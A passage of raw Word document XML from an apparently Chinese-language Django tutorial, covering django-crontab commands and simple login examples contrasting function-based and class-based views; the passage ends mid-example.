        <w:t xml:space="preserve">    except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB9BF4C" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发生错误，错误信息为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ECA577" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5894C4C8" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4E24EA" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EB134D" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33505933" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7AC67B" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1D2510" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6223C27C" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、如何使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E8E9A3" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启定时器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5257DCD8" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC02104" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python manage.py crontab add  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BF420F" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C562EB6" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看开启的定时器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514AE038" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4088B7F5" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">python manage.py crontab show  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58061642" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C90BD29" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭定时器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B5D045" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029C7330" w14:textId="6AFD9D50" w:rsidR="00920CDF" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python manage.py crontab remove </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFC21D0" w14:textId="77777777" w:rsidR="00920CDF" w:rsidRDefault="00920CDF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016A8F45" w14:textId="77777777" w:rsidR="00920CDF" w:rsidRDefault="00920CDF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C3DFFB" w14:textId="77777777" w:rsidR="00920CDF" w:rsidRDefault="00920CDF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44660DBE" w14:textId="77777777" w:rsidR="00C57CAD" w:rsidRDefault="00C57CAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54AEBAD1" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54AEED8E" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC2AD5E" w14:textId="3046E882" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="658" w:name="_Toc159780088"/>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">FBV </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CBV</w:t>
      </w:r>
      <w:bookmarkEnd w:id="658"/>
    </w:p>
    <w:p w14:paraId="04635A76" w14:textId="0AA74D4B" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="659" w:name="_Toc159780089"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>BV</w:t>
      </w:r>
      <w:bookmarkEnd w:id="659"/>
    </w:p>
    <w:p w14:paraId="43508732" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FBV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>function base views</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于函数的视图，就是在视图里使用函数处理请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F6841" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="555BA81E" w14:textId="6701208D" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于函数的视图其实我们前面章节一直在使用，就是使用了函数来处理用户的请求，查看以下实例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B6561" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE76D99" w14:textId="5BE885C3" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>rls.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60457F3C" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRPr="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>urlpatterns = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652F087F" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRPr="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    path("login/", views.login),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7046F6D1" w14:textId="5865D8F6" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24702AF1" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47DF903E" w14:textId="6D0D769F" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>iews.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697CB5C9" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRPr="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>from django.shortcuts import render,HttpResponse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7056DE59" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRPr="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F9CDF9D" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRPr="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>def login(request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503B576F" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRPr="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    if request.method == "GET":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F962F85" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRPr="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        return HttpResponse("GET </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA9ADE7" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRPr="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    if request.method == "POST":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B812D50" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRPr="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        user = request.POST.get("user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B45152" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRPr="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        pwd = request.POST.get("pwd")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A088FD" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRPr="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        if user == "runoob" and pwd == "123456":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B40F5A" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRPr="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            return HttpResponse("POST </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BDC76F" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRPr="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF0BCC" w14:textId="0F98E211" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            return HttpResponse("POST </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA42062" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE9DFAA" w14:textId="10B4B5A5" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="660" w:name="_Toc159780090"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>BV</w:t>
      </w:r>
      <w:bookmarkEnd w:id="660"/>
    </w:p>
    <w:p w14:paraId="6C65F962" w14:textId="7E2F25FB" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CBV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class base views</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于类的视图，就是在视图里使用类处理请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78522D1E" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F211956" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A688B1B" w14:textId="69E40416" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>rls.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432628E5" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>urlpatterns = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FBA82B" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    path("login/", views.Login.as_view()),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38093366" w14:textId="366F3E55" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061E9EBB" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C421105" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="519C5756" w14:textId="14D267C1" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> views.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE0C4E" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from django.shortcuts import render,HttpResponse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105B001A" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from django.views import View</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1FB147" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70E09D5F" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class Login(View):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740248A2" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>def get(self,request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A96A43" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return HttpResponse("GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5E461B" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47B47BBC" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>def post(self,request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FBB3EF" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">       user = request.POST.get("user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6032D374" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">       pwd = request.POST.get("pwd")</w:t>
      </w:r>
    </w:p>
